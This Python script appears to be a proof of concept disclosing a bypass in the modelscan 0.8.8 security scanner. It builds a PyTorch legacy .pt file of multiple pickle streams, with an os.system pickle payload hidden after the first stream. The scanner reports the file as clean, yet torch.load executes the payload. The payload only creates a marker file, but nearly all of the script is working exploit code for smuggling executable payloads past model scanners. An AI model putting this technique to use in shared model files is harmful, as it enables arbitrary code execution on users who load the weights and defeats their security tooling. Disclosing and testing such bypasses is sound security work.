| |
| """Self-contained PoC: modelscan 0.8.8 inspects only the first of multiple sequential |
| pickle streams in a PyTorch legacy .pt, reporting a malicious file as clean while |
| torch.load(weights_only=False) executes the payload. |
| |
| Requires: modelscan==0.8.8, torch. Run: python poc.py |
| Payload is a benign marker (touch MP_legacy_pwn); no network, no destructive action. |
| """ |
| import os, sys, pickle, subprocess |
|
|
| MAGIC = 0x1950a86a20f9469cfc6c |
|
|
|
|
| def build_multi(path): |
| |
| |
| |
| |
| class Payload: |
| def __reduce__(self): |
| return (os.system, ("touch MP_legacy_pwn",)) |
| streams = [pickle.dumps(MAGIC), pickle.dumps(1001), pickle.dumps({}), |
| pickle.dumps(Payload()), pickle.dumps([])] |
| with open(path, "wb") as f: |
| f.write(b"".join(streams)) |
|
|
|
|
| def build_single(path): |
| class Ctl: |
| def __reduce__(self): |
| return (os.system, ("true",)) |
| with open(path, "wb") as f: |
| f.write(pickle.dumps(Ctl())) |
|
|
|
|
| def scan(path): |
| r = subprocess.run(["modelscan", "-p", path], capture_output=True, text=True) |
| return r.stdout + r.stderr |
|
|
|
|
| build_multi("evil_legacy.pt") |
| multi_clean = "No issues found" in scan("evil_legacy.pt") |
|
|
| if os.path.exists("MP_legacy_pwn"): |
| os.remove("MP_legacy_pwn") |
| import torch |
| load_ok = False |
| try: |
| torch.load("evil_legacy.pt", weights_only=False) |
| load_ok = True |
| except Exception: |
| pass |
| executed = os.path.exists("MP_legacy_pwn") |
|
|
| build_single("evil_single.pkl") |
| single_flagged = "system" in scan("evil_single.pkl").lower() |
|
|
| print("multi-stream .pt scan clean :", multi_clean) |
| print("torch.load completed cleanly:", load_ok) |
| print("loader executed payload :", executed) |
| print("single-stream control flagged:", single_flagged) |
| ok = multi_clean and load_ok and executed and single_flagged |
| print("RESULT:", "PASS - scanner bypass confirmed" if ok else "FAIL") |
| sys.exit(0 if ok else 1) |
|
|